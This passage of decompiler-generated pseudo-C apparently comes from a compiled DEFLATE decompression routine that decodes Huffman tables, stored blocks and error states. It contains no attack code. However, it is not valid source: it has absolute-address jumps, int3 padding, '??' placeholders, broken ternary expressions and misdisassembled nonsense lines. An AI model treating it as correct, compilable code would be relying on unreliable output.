																 *(_t1029 + 0x18) = _t694;
																if(_t694 != 0) {
																	L123:
																	__eflags = _t694 - 3;
																	if(_t694 == 3) {
																		L266:
																		 *(_t1066 - 0xc) = 0xffffffff;
																		 *_t1029 = 0xa;
																		goto L292;
																	} else {
																		L124:
																		__eflags = _t694 - 1;
																		if(_t694 != 1) {
																			L127:
																			_t897 = 0;
																			__eflags = 0;
																			while(1) {
																				L128:
																				 *(_t1066 - 8) = _t897;
																				__eflags = _t897 - 3;
																				if(_t897 >= 3) {
																					break;
																				}
																				L129:
																				_t595 =  *((char*)(_t897 + 0x41e1004));
																				 *(_t1066 - 0x1c) = _t595;
																				__eflags = _t1050 - _t595;
																				if(_t1050 >= _t595) {
																					L132:
																					_t1024 = _t1029 + _t897 * 4;
																					_t1043 =  *(_t1066 - 4);
																					 *(_t1024 + 0x2c) = (0x00000001 <<  *(_t1066 - 0x1c)) - 0x00000001 & _t1043;
																					_t806 =  *(_t1066 - 8);
																					_t936 =  *((char*)(_t806 + 0x41e1004));
																					_t1044 = _t1043 >> _t936;
																					_t1050 = _t1050 - _t936;
																					_t937 = _t806;
																					 *(_t1066 - 4) = _t1044;
																					 *(_t1066 - 0x1c) = _t1050;
																					 *(_t1024 + 0x2c) =  *(_t1024 + 0x2c) +  *((intOrPtr*)(0x41e1a38 + _t937 * 4));
																					_t997 = _t1044;
																					_t1029 =  *(_t1066 - 0x14);
																					_t897 = _t937 + 1;
																					continue;
																				} else {
																					while(1) {
																						L130:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L131:
																						_t809 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t897 =  *(_t1066 - 8);
																						_t997 = _t997 | _t809;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 0x18) = _t846;
																						 *(_t1066 - 4) = _t997;
																						_t595 =  *((char*)(_t897 + 0x41e1004));
																						 *(_t1066 - 0x1c) = _t595;
																						__eflags = _t1050 - _t595;
																						if(_t1050 < _t595) {
																							continue;
																						} else {
																							goto L132;
																						}
																						goto L295;
																					}
																					L248:
																					 *_t1029 = 0xb;
																					goto L285;
																				}
																				goto L295;
																			}
																			L133:
																			L134:
																			_t595 = memset(_t1029 + 0x1b80, 0, ??);
																			_t998 =  *(_t1066 - 4);
																			_t1068 = _t1068 + 0xc;
																			_t898 = 0;
																			__eflags = 0;
																			while(1) {
																				L135:
																				 *(_t1066 - 8) = _t898;
																				__eflags = _t898 -  *((intOrPtr*)(_t1029 + 0x34));
																				if(_t898 >=  *((intOrPtr*)(_t1029 + 0x34))) {
																					break;
																				}
																				L136:
																				__eflags = _t1050 - 3;
																				if(_t1050 >= 3) {
																					L139:
																					_t932 = _t998 & 0x00000007;
																					_t998 = _t998 >> 3;
																					_t1050 = _t1050 - 3;
																					 *(_t1066 - 4) = _t998;
																					 *(_t1066 - 0x1c) = _t1050;
																					_t595 =  *( *(_t1066 - 8) + 0x41e1a24) & 0x000000ff;
																					 *(_t1029 + 0x1b80 + _t595) = _t932;
																					_t898 =  *(_t1066 - 8) + 1;
																					continue;
																				} else {
																					while(1) {
																						L137:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L138:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t998 = _t998 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t998;
																						__eflags = _t1050 - 3;
																						if(_t1050 < 3) {
																							continue;
																						} else {
																							goto L139;
																						}
																						goto L295;
																					}
																					L249:
																					 *_t1029 = 0xe;
																					goto L285;
																				}
																				goto L295;
																			}
																			L140:
																			 *((intOrPtr*)(_t1029 + 0x34)) = 0x13;
																			goto L141;
																		} else {
																			L125:
																			goto 0x41f14d8;
																			asm("int3");
																			asm("int3");
																			 *((intOrPtr*)(_t694 + 0x2c)) = 0x120;
																			L126:
																			_t811 = _t694 + 1 - 0x20;
																			 *_t811 =  *_t811 + _t811;
																			_t846 = _t846 + _t811;
																			_t812 = _t811 + 1;
																			 *_t812 =  *_t812 ^ _t812;
																			 *_t812 = _t812 +  *_t812;
																			 *0xde0 =  *0xde0 + _t812;
																			memset(_t812, ??, ??);
																			asm("movdqa xmm0, [0x41e1ae0]");
																			_t1068 = _t1068 + 0xc;
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movdqu [edi+0x80], xmm0");
																			asm("movdqu [edi+0x90], xmm0");
																			asm("movdqu [edi+0xa0], xmm0");
																			asm("movdqu [edi+0xb0], xmm0");
																			asm("movdqu [edi+0xc0], xmm0");
																			_t1045 = _t1029 + 0xd0;
																			asm("movdqa xmm0, [0x41e1af0]");
																			asm("movdqu [edi], xmm0");
																			asm("movdqu [edi+0x10], xmm0");
																			asm("movdqu [edi+0x20], xmm0");
																			asm("movdqu [edi+0x30], xmm0");
																			asm("movdqu [edi+0x40], xmm0");
																			asm("movdqu [edi+0x50], xmm0");
																			asm("movdqu [edi+0x60], xmm0");
																			asm("movdqa xmm0, [0x41e1ad0]");
																			asm("movdqu [edi+0x70], xmm0");
																			asm("movq [edi+0x80], xmm0");
																			 *((intOrPtr*)(_t1045 + 0x88)) = 0x8080808;
																			 *((intOrPtr*)(_t1045 + 0x8c)) = 0x8080808;
																			_t1029 =  *(_t1066 - 0x14);
																			while(1) {
																				L141:
																				_t696 =  *(_t1029 + 0x18);
																				__eflags = _t696;
																				if(_t696 < 0) {
																					break;
																				}
																				L142:
																				 *(_t1066 - 0xc) = 0x40 + _t696 * 0xda0 + _t1029;
																				memset(_t1066 - 0xd0, 0, 0x40);
																				memset( *(_t1066 - 0xc) + 0x120, 0, 0x800);
																				memset( *(_t1066 - 0xc) + 0x920, 0, 0x480);
																				_t899 = 0;
																				_t1068 = _t1068 + 0x24;
																				_t1012 = _t1029 + ( *(_t1029 + 0x18) + 0xb) * 4;
																				 *(_t1066 - 0x44) = _t1012;
																				__eflags =  *_t1012;
																				if( *_t1012 > 0) {
																					L143:
																					_t1029 =  *(_t1066 - 0xc);
																					do {
																						L144:
																						_t799 =  *(_t899 + _t1029) & 0x000000ff;
																						_t899 = _t899 + 1;
																						 *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) =  *((intOrPtr*)(_t1066 + _t799 * 4 - 0xd0)) + 1;
																						__eflags = _t899 -  *_t1012;
																					} while (_t899 <  *_t1012);
																				}
																				L145:
																				goto 0x41f1500;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				L146:
																				 *(_t1066 - 0x8c) = _t899;
																				 *(_t1066 - 0x90) = _t899;
																				 *(_t1066 - 0x2c) = _t899;
																				 *(_t1066 - 0x30) = _t899;
																				do {
																					L147:
																					_t736 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd4));
																					_t901 = _t899 + _t736 + _t899 + _t736;
																					_t1029 = _t1029 + _t736;
																					_t737 =  *((intOrPtr*)(_t1066 + _t1012 - 0xd0));
																					 *(_t1066 - 0x30) =  *(_t1066 - 0x30) + _t737;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x90)) = _t901;
																					_t738 =  *((intOrPtr*)(_t1066 + _t1012 - 0xcc));
																					_t903 = _t901 + _t737 + _t901 + _t737;
																					 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) + _t738;
																					 *((intOrPtr*)(_t1066 + _t1012 - 0x8c)) = _t903;
																					_t899 = _t903 + _t738 + _t903 + _t738;
																					 *(_t1066 + _t1012 - 0x88) = _t899;
																					_t1012 = _t1012 + 0xc;
																					__eflags = _t1012 - 0x40;
																				} while (_t1012 <= 0x40);
																				 *(_t1066 - 0x4c) = _t899;
																				 *(_t1066 - 0x24) = _t1029;
																				_t1029 =  *(_t1066 - 0x14);
																				_t906 =  *(_t1066 - 0x24) +  *(_t1066 - 0x2c) +  *(_t1066 - 0x30);
																				__eflags =  *(_t1066 - 0x4c) - 0x10000;
																				if( *(_t1066 - 0x4c) == 0x10000) {
																					L150:
																					_t741 =  *(_t1066 - 0x44);
																					 *(_t1066 - 0x30) = 0xffffffff;
																					 *(_t1066 - 0x4c) = 0;
																					__eflags =  *_t741;
																					if( *_t741 > 0) {
																						L151:
																						_t1065 =  *(_t1066 - 0x4c);
																						do {
																							L152:
																							L153:
																							_t918 =  *(_t1065 + _t741) & 0x000000ff;
																							 *(_t1066 - 0x44) = _t918;
																							__eflags = _t918;
																							if(_t918 != 0) {
																								L154:
																								_t778 =  *(_t1066 + _t918 * 4 - 0x90);
																								 *(_t1066 - 0x2c) = _t778;
																								 *(_t1066 + _t918 * 4 - 0x90) = _t778 + 1;
																								 *(_t1066 - 0x24) = _t918;
																								__eflags = _t918;
																								if(_t918 != 0) {
																									L155:
																									do {
																										L156:
																										 *(_t1066 - 0x2c) =  *(_t1066 - 0x2c) >> 1;
																										_t798 =  *(_t1066 - 0x24) - 1;
																										_t1012 = _t1012 + _t1012 |  *(_t1066 - 0x2c) & 0x00000001;
																										 *(_t1066 - 0x24) = _t798;
																										__eflags = _t798;
																									} while (_t798 != 0);
																									_t918 =  *(_t1066 - 0x44);
																								}
																								L158:
																								__eflags = _t918 - 0xa;
																								if(_t918 > 0xa) {
																									L164:
																									_t782 =  *(_t1066 - 0xc) + 0x120 + (_t1012 & 0x000003ff) * 2;
																									_t846 =  *(_t1066 - 0x30);
																									 *(_t1066 - 0x44) = _t782;
																									_t783 =  *_t782;
																									 *(_t1066 - 0x2c) = _t783;
																									__eflags = _t783;
																									if(_t783 == 0) {
																										 *( *(_t1066 - 0x44)) = _t846;
																										_t783 = _t846;
																										_t846 = _t846 - 2;
																										__eflags = _t846;
																										 *(_t1066 - 0x2c) = _t783;
																										 *(_t1066 - 0x30) = _t846;
																									}
																									L166:
																									_t1020 = _t1012 >> 9;
																									__eflags = _t918 - 0xb;
																									if(_t918 > 0xb) {
																										L167:
																										_t919 = _t918 + 0xfffffff5;
																										__eflags = _t919;
																										 *(_t1066 - 0x24) = _t919;
																										_t920 =  *(_t1066 - 0x2c);
																										do {
																											L168:
																											_t1020 = _t1020 >> 1;
																											_t788 = 0x48f - _t920 - (_t1020 & 0x00000001);
																											_t923 =  *( *(_t1066 - 0xc) + 0x91e) & 0x0000ffff;
																											__eflags = _t923;
																											if(_t923 != 0) {
																												_t920 = _t923;
																											} else {
																												 *( *(_t1066 - 0xc) + _t788 * 2) = _t846;
																												_t789 =  *(_t1066 - 0x30);
																												_t920 = _t789;
																												_t790 = _t789 - 2;
																												 *(_t1066 - 0x30) = _t790;
																												_t846 = _t790;
																											}
																											L171:
																											_t361 = _t1066 - 0x24;
																											 *_t361 =  *(_t1066 - 0x24) - 1;
																											__eflags =  *_t361;
																										} while ( *_t361 != 0);
																										 *(_t1066 - 0x2c) = _t920;
																										_t783 = _t920;
																									}
																									L173:
																									_t1012 = (_t1020 >> 0x00000001 & 0x00000001) - _t783;
																									__eflags = _t1012;
																									 *( *(_t1066 - 0xc) + 0x91e + _t1012 * 2) = _t1065;
																								} else {
																									L159:
																									_t795 = (_t918 << 0x00000009 | _t1065) & 0x0000ffff;
																									 *(_t1066 - 0x44) = _t795;
																									__eflags = _t1012 - 0x400;
																									if(_t1012 < 0x400) {
																										L160:
																										goto 0x41f152a;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										L161:
																										_t796 = _t795 << _t918;
																										 *(_t1066 - 0x4c) = _t796 + _t796;
																										_t928 =  *(_t1066 - 0xc) + _t1012 * 2 + 0x120;
																										__eflags = _t928;
																										do {
																											L162:
																											 *_t928 = _t1029;
																											_t1012 = _t1012 + _t796;
																											_t928 = _t928 +  *(_t1066 - 0x4c);
																											__eflags = _t1012 - 0x400;
																										} while (_t1012 < 0x400);
																										_t1029 =  *(_t1066 - 0x14);
																									}
																								}
																							}
																							L174:
																							_t741 =  *(_t1029 + 0x18);
																							_t1065 = _t1065 + 1;
																							__eflags = _t1065 -  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4));
																						} while (_t1065 <  *((intOrPtr*)(_t1029 + 0x2c + _t741 * 4)));
																						goto 0x41f1540;
																						asm("int3");
																					}
																					L176:
																					__eflags =  *(_t1029 + 0x18) - 2;
																					if( *(_t1029 + 0x18) != 2) {
																						L217:
																						 *(_t1029 + 0x18) =  *(_t1029 + 0x18) - 1;
																						continue;
																					} else {
																						L177:
																						_t907 = 0;
																						__eflags = 0;
																						while(1) {
																							L178:
																							_t1013 =  *(_t1066 - 4);
																							while(1) {
																								L179:
																								 *(_t1066 - 8) = _t907;
																								__eflags = _t907 -  *(_t1029 + 0x30) +  *(_t1029 + 0x2c);
																								if(_t907 >=  *(_t1029 + 0x30) +  *(_t1029 + 0x2c)) {
																									break;
																								}
																								L180:
																								__eflags = _t1065 - 0xf;
																								if(_t1065 >= 0xf) {
																									L197:
																									_t756 =  *((short*)(_t1029 + 0x1ca0 + (_t1013 & 0x000003ff) * 2));
																									 *(_t1066 - 0x28) = _t756;
																									__eflags = _t756;
																									if(_t756 < 0) {
																										L199:
																										L200:
																										do {
																											L201:
																											 *(_t1066 - 0x28) =  !( *(_t1066 - 0x28));
																											_t758 = _t1013 >> _t907;
																											_t907 = _t907 + 1;
																											_t595 =  *((short*)(_t1029 + 0x24a0 + ((_t758 & 0x00000001) +  *(_t1066 - 0x28)) * 2));
																											 *(_t1066 - 0x28) = _t595;
																											__eflags = _t595;
																										} while (_t595 < 0);
																									} else {
																										L198:
																										_t907 = _t756 >> 9;
																										_t595 = _t756 & 0x000001ff;
																										 *(_t1066 - 0x28) = _t595;
																									}
																									L202:
																									_t1013 = _t1013 >> _t907;
																									_t1050 = _t1065 - _t907;
																									 *(_t1066 - 4) = _t1013;
																									 *(_t1066 - 0x1c) = _t1050;
																									__eflags = _t595 - 0x10;
																									if(__eflags >= 0) {
																										L204:
																										if(__eflags != 0) {
																											L207:
																											_t908 =  *((char*)(_t595 + 0x41e0ff0));
																											 *(_t1066 - 0x38) = _t908;
																											__eflags = _t1050 - _t908;
																											if(_t1050 >= _t908) {
																												L211:
																												_t1050 = _t1050 - _t908;
																												 *(_t1066 - 0x1c) = _t1050;
																												_t909 =  *(_t1066 - 0x14);
																												_t1039 = ((0x00000001 << _t908) - 0x00000001 & _t1013) +  *((char*)(_t595 + 0x41e0ff8));
																												__eflags =  *(_t1066 - 0x28) - 0x10;
																												_t762 =  *(_t1066 - 8);
																												 *(_t1066 - 4) = _t1013 >> _t908;
																												if( *(_t1066 - 0x28) != 0x10) {
																													_t1016 = 0;
																													__eflags = 0;
																												} else {
																													_t1016 =  *(_t762 + _t909 + 0x2923) & 0x000000ff;
																												}
																												L214:
																												memset(_t762 + _t909 + 0x2924, _t1016, _t1039);
																												_t1068 = _t1068 + 0xc;
																												_t907 =  *(_t1066 - 8) + _t1039;
																												_t1029 =  *(_t1066 - 0x14);
																												L178:
																												_t1013 =  *(_t1066 - 4);
																												continue;
																											} else {
																												while(1) {
																													L208:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														break;
																													}
																													L209:
																													_t595 = ( *_t846 & 0x000000ff) << _t1050;
																													_t846 = _t846 + 1;
																													_t908 =  *(_t1066 - 0x38);
																													_t1013 = _t1013 | _t595;
																													_t1050 = _t1050 + 8;
																													 *(_t1066 - 0x18) = _t846;
																													 *(_t1066 - 4) = _t1013;
																													__eflags = _t1050 - _t908;
																													if(_t1050 < _t908) {
																														continue;
																													} else {
																														L210:
																														_t595 =  *(_t1066 - 0x28);
																														goto L211;
																													}
																													goto L295;
																												}
																												L251:
																												 *_t1029 = 0x12;
																												goto L285;
																											}
																										} else {
																											L205:
																											_t766 =  *(_t1066 - 8);
																											__eflags = _t766;
																											if(_t766 == 0) {
																												L268:
																												_t684 = _t766 | 0xffffffff;
																												 *_t1029 = 0x11;
																												goto L291;
																											} else {
																												L206:
																												_t595 =  *(_t1066 - 0x28);
																												goto L207;
																											}
																										}
																									} else {
																										L203:
																										_t913 =  *(_t1066 - 8);
																										 *(_t1029 + 0x2924 + _t913) = _t595;
																										_t907 = _t913 + 1;
																										continue;
																									}
																								} else {
																									L181:
																									__eflags =  *(_t1066 - 0x20) - _t846 - 2;
																									if( *(_t1066 - 0x20) - _t846 >= 2) {
																										L195:
																										_t1017 =  *(_t846 + 1) & 0x000000ff;
																										_t769 =  *_t846 & 0x000000ff;
																										_t846 = _t846 + 2;
																										_t907 = _t1065;
																										 *(_t1066 - 0x18) = _t846;
																										 *(_t1066 - 4) =  *(_t1066 - 4) | _t1017 << _t1065 + 0x00000008 | _t769 << _t907;
																										_t1065 = _t1065 + 0x10;
																										__eflags = _t1065;
																										_t1013 =  *(_t1066 - 4);
																										goto L196;
																									} else {
																										do {
																											L182:
																											_t595 = _t1013 & 0x000003ff;
																											_t1040 =  *((short*)(_t1029 + 0x1ca0 + _t595 * 2));
																											__eflags = _t1040;
																											if(_t1040 < 0) {
																												L186:
																												__eflags = _t1065 - 0xa;
																												if(_t1065 <= 0xa) {
																													goto L191;
																												} else {
																													L187:
																													L188:
																													 *(_t1066 - 0x24) = _t907;
																													while(1) {
																														L189:
																														_t1040 =  *((short*)( *(_t1066 - 0x14) + 0x24a0 + ((_t1013 >> _t907 & 0x00000001) +  !_t1040) * 2));
																														_t907 =  *(_t1066 - 0x24) + 1;
																														 *(_t1066 - 0x24) = _t907;
																														__eflags = _t1040;
																														if(_t1040 >= 0) {
																															goto L196;
																														}
																														L190:
																														_t595 = _t907 + 1;
																														__eflags = _t1065 - _t595;
																														if(_t1065 >= _t595) {
																															continue;
																														} else {
																															goto L191;
																														}
																														goto L295;
																													}
																													goto L196;
																												}
																											} else {
																												L183:
																												_t1042 = _t1040 >> 9;
																												__eflags = _t1042;
																												if(_t1042 == 0) {
																													L191:
																													_t1029 =  *(_t1066 - 0x14);
																													L192:
																													__eflags = _t846 -  *(_t1066 - 0x20);
																													if(_t846 >=  *(_t1066 - 0x20)) {
																														L250:
																														 *_t1029 = 0x10;
																														goto L285;
																													} else {
																														goto L193;
																													}
																												} else {
																													L184:
																													__eflags = _t1065 - _t1042;
																													if(_t1065 >= _t1042) {
																														L196:
																														_t1029 =  *(_t1066 - 0x14);
																														goto L197;
																													} else {
																														L185:
																														goto L191;
																													}
																												}
																											}
																											goto L295;
																											L193:
																											_t907 = _t1065;
																											_t773 = ( *_t846 & 0x000000ff) << _t907;
																											_t846 = _t846 + 1;
																											_t1013 = _t1013 | _t773;
																											 *(_t1066 - 0x18) = _t846;
																											_t1065 = _t1065 + 8;
																											 *(_t1066 - 4) = _t1013;
																											__eflags = _t1065 - 0xf;
																										} while (_t1065 < 0xf);
																										goto L197;
																									}
																								}
																								goto L295;
																							}
																							L215:
																							_t1014 =  *(_t1029 + 0x2c);
																							_t745 =  *(_t1029 + 0x30) + _t1014;
																							__eflags = _t745 - _t907;
																							if(_t745 != _t907) {
																								L269:
																								_t684 = _t745 | 0xffffffff;
																								 *_t1029 = 0x15;
																								goto L291;
																							} else {
																								L216:
																								memcpy(_t1029 + 0x40, _t1029 + 0x2924, _t1014);
																								_t751 =  *(_t1029 + 0x2c) + 0x2924 + _t1029;
																								__eflags = _t751;
																								memcpy(_t1029 + 0xde0, _t751,  *(_t1029 + 0x30));
																								_t1068 = _t1068 + 0x18;
																								goto L217;
																							}
																							goto L295;
																						}
																					}
																				} else {
																					L149:
																					__eflags = _t906 - 1;
																					if(_t906 > 1) {
																						L267:
																						 *(_t1066 - 0xc) = 0xffffffff;
																						 *_t1029 = 0x23;
																						goto L292;
																					} else {
																						goto L150;
																					}
																				}
																				goto L295;
																			}
																			L218:
																			_t988 =  *(_t1066 - 4);
																			while(1) {
																				L38:
																				_t883 =  *(_t1066 - 0x20) - _t846;
																				__eflags = _t883 - 4;
																				if(_t883 < 4) {
																					goto L57;
																				}
																				goto L39;
																			}
																			goto L57;
																		}
																	}
																} else {
																	L89:
																	_t595 = _t1050 & 0x00000007;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		L92:
																		_t940 = _t1050 & 0x00000007;
																		_t987 = _t997 >> _t940;
																		_t1050 = _t1050 - _t940;
																		 *(_t1066 - 4) = _t987;
																		_t941 = 0;
																		__eflags = 0;
																		while(1) {
																			L93:
																			 *(_t1066 - 8) = _t941;
																			__eflags = _t941 - 4;
																			if(_t941 >= 4) {
																				break;
																			}
																			L94:
																			__eflags = _t1050;
																			if(_t1050 == 0) {
																				L100:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					L244:
																					 *_t1029 = 7;
																					goto L285;
																				} else {
																					L101:
																					_t595 =  *_t846;
																					_t846 = _t846 + 1;
																					(_t1029 + 0x2920)[_t941] = _t595;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 0x18) = _t846;
																					continue;
																				}
																			} else {
																				L95:
																				__eflags = _t1050 - 8;
																				if(_t1050 >= 8) {
																					L99:
																					(_t1029 + 0x2920)[_t941] = _t987;
																					_t1050 = _t1050 - 8;
																					_t987 = _t987 >> 8;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 4) = _t987;
																					continue;
																				} else {
																					while(1) {
																						L96:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L97:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t987 = _t987 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t987;
																						__eflags = _t1050 - 8;
																						if(_t1050 < 8) {
																							continue;
																						} else {
																							L98:
																							_t941 =  *(_t1066 - 8);
																							goto L99;
																						}
																						goto L295;
																					}
																					L243:
																					 *_t1029 = 6;
																					goto L285;
																				}
																			}
																			goto L295;
																		}
																		L102:
																		_t595 =  *(_t1029 + 0x2922) & 0x000000ff;
																		 *(_t1066 - 8) = ( *(_t1029 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1029 + 0x2920) & 0x000000ff;
																		__eflags =  *(_t1066 - 8) - ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff);
																		if( *(_t1066 - 8) != ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff)) {
																			L265:
																			 *(_t1066 - 0xc) = 0xffffffff;
																			 *_t1029 = 0x27;
																			goto L292;
																		} else {
																			L103:
																			_t949 =  *(_t1066 - 8);
																			while(1) {
																				L104:
																				__eflags = _t949;
																				if(_t949 == 0) {
																					goto L84;
																				}
																				L105:
																				__eflags = _t1050;
																				if(_t1050 == 0) {
																					L112:
																					_t595 =  *(_t1066 - 0x10);
																					while(1) {
																						L113:
																						__eflags = _t949;
																						if(_t949 == 0) {
																							break;
																						}
																						L115:
																						_t1025 =  *((intOrPtr*)(_t1066 - 0x40));
																						__eflags = _t595 - _t1025;
																						if(_t595 < _t1025) {
																							L117:
																							_t595 =  *(_t1066 - 0x20);
																							__eflags = _t846 - _t595;
																							if(_t846 >= _t595) {
																								L247:
																								_t1029 =  *(_t1066 - 0x14);
																								 *_t1029 = 0x26;
																								goto L285;
																							} else {
																								L118:
																								_t987 = _t1025 -  *(_t1066 - 0x10);
																								_t1047 = _t595 - _t846;
																								__eflags = _t987 - _t1047;
																								_t817 =  <  ? _t987 : _t1047;
																								__eflags = ( <  ? _t987 : _t1047) - _t949;
																								if(( <  ? _t987 : _t1047) >= _t949) {
																									_t1029 = _t949;
																								} else {
																									__eflags = _t987 - _t1047;
																									_t1029 =  <  ? _t987 : _t1047;
																								}
																								L121:
																								L122:
																								memcpy();
																								_t846 = _t846 + _t1029;
																								_t595 =  *(_t1066 - 0x10) + _t1029;
																								_t1068 = _t1068 + 0xc;
																								 *(_t1066 - 0x18) = _t846;
																								_t949 =  *(_t1066 - 8) - _t1029;
																								 *(_t1066 - 0x10) = _t595;
																								 *(_t1066 - 8) = _t949;
																								continue;
																							}
																						} else {
																							L116:
																							_t1029 =  *(_t1066 - 0x14);
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 9;
																							goto L292;
																						}
																						goto L295;
																					}
																					L114:
																					goto 0x41f14b1;
																					asm("int3");
																					goto L84;
																				} else {
																					L106:
																					__eflags = _t1050 - 8;
																					if(_t1050 >= 8) {
																						L109:
																						_t595 = _t987 & 0x000000ff;
																						_t987 = _t987 >> 8;
																						_t1050 = _t1050 - 8;
																						 *(_t1066 - 0x28) = _t595;
																						 *(_t1066 - 4) = _t987;
																						L110:
																						__eflags =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 - 0x40));
																						_t1029 =  *(_t1066 - 0x14);
																						if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
																							L246:
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 0x34;
																							goto L292;
																						} else {
																							L111:
																							 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
																							 *( *(_t1066 - 0x10)) = _t595;
																							_t949 =  *(_t1066 - 8) - 1;
																							 *(_t1066 - 8) = _t949;
																							continue;
																						}
																					} else {
																						while(1) {
																							L107:
																							__eflags = _t846 -  *(_t1066 - 0x20);
																							if(_t846 >=  *(_t1066 - 0x20)) {
																								break;
																							}
																							L108:
																							_t595 = ( *_t846 & 0x000000ff) << _t1050;
																							_t846 = _t846 + 1;
																							_t987 = _t987 | _t595;
																							 *(_t1066 - 0x18) = _t846;
																							_t1050 = _t1050 + 8;
																							 *(_t1066 - 4) = _t987;
																							__eflags = _t1050 - 8;
																							if(_t1050 < 8) {
																								continue;
																							} else {
																								goto L109;
																							}
																							goto L295;
																						}
																						L245:
																						 *_t1029 = 0x33;
																						goto L285;
																					}
																				}
																				goto L295;
																			}
																			continue;
																		}
																	} else {
																		while(1) {
																			L90:
																			__eflags = _t846 -  *(_t1066 - 0x20);
																			if(_t846 >=  *(_t1066 - 0x20)) {
																				break;
																			}
																			L91:
																			_t823 = ( *_t846 & 0x000000ff) << _t1050;
																			_t1050 = _t1050 + 8;
																			_t997 = _t997 | _t823;
																			_t846 = _t846 + 1;
																			 *(_t1066 - 0x18) = _t846;
																			_t595 = _t1050 & 0x00000007;
																			 *(_t1066 - 4) = _t997;
																			__eflags = _t1050 - _t595;
																			if(_t1050 < _t595) {
																				continue;
																			} else {
																				goto L92;
																			}
																			goto L295;
																		}
																		L242:
																		 *_t1029 = 5;
																		goto L285;
																	}
																}
															} else {
																while(1) {
																	L86:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L87:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t987 = _t987 | _t595;
																	 *(_t1066 - 0x18) = _t846;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - 3;
																	if(_t1050 < 3) {
																		continue;
																	} else {
																		goto L88;
																	}
																	goto L295;
																}
																L241:
																 *_t1029 = 3;
																goto L285;
															}
															goto L295;
														}
														L252:
														_t595 = _t1064 & 0x00000007;
														__eflags = _t1064 - _t595;
														if(_t1064 >= _t595) {
															L256:
															_t683 =  *(_t1066 - 0x3c);
															_t890 = _t1064 & 0x00000007;
															_t992 = _t987 >> _t890;
															_t1050 = _t1064 - _t890;
															 *(_t1066 - 4) = _t992;
															__eflags = _t846 - _t683;
															if(_t846 > _t683) {
																while(1) {
																	L257:
																	__eflags = _t1050 - 8;
																	if(_t1050 < 8) {
																		goto L259;
																	}
																	L258:
																	_t846 = _t846 - 1;
																	_t1050 = _t1050 - 8;
																	__eflags = _t846 - _t683;
																	if(_t846 > _t683) {
																		continue;
																	}
																	goto L259;
																}
															}
															L259:
															L260:
															_t595 = _t1050;
															asm("bts edx, eax");
															__eflags = _t595 - 0x20;
															_t892 =  >=  ? _t992 : 0;
															_t993 = _t992 ^ _t892;
															__eflags = _t595 - 0x40;
															_t893 =  >=  ? _t993 : _t892;
															 *(_t1066 - 4) =  *(_t1066 - 4) & _t993 - 0x00000001;
															__eflags =  *(_t1066 + 0x18) & 0x00000001;
															if(( *(_t1066 + 0x18) & 0x00000001) == 0) {
																L290:
																_t684 = 0;
																__eflags = 0;
																 *_t1029 = 0x22;
																goto L291;
															} else {
																L261:
																_t894 = 0;
																while(1) {
																	L277:
																	 *(_t1066 - 8) = _t894;
																	__eflags = _t894 - 4;
																	if(_t894 >= 4) {
																		goto L290;
																	}
																	L278:
																	__eflags = _t1050;
																	if(_t1050 != 0) {
																		L281:
																		_t995 =  *(_t1066 - 4);
																		__eflags = _t1050 - 8;
																		if(_t1050 >= 8) {
																			L275:
																			_t685 = _t995 & 0x000000ff;
																			_t1050 = _t1050 - 8;
																			__eflags = _t1050;
																			 *(_t1066 - 4) = _t995 >> 8;
																			goto L276;
																		} else {
																			L282:
																			while(1) {
																				L272:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					break;
																				}
																				L273:
																				_t595 = ( *_t846 & 0x000000ff) << _t1050;
																				_t1050 = _t1050 + 8;
																				_t995 = _t995 | _t595;
																				_t846 = _t846 + 1;
																				 *(_t1066 - 4) = _t995;
																				__eflags = _t1050 - 8;
																				if(_t1050 < 8) {
																					continue;
																				} else {
																					L274:
																					_t894 =  *(_t1066 - 8);
																					goto L275;
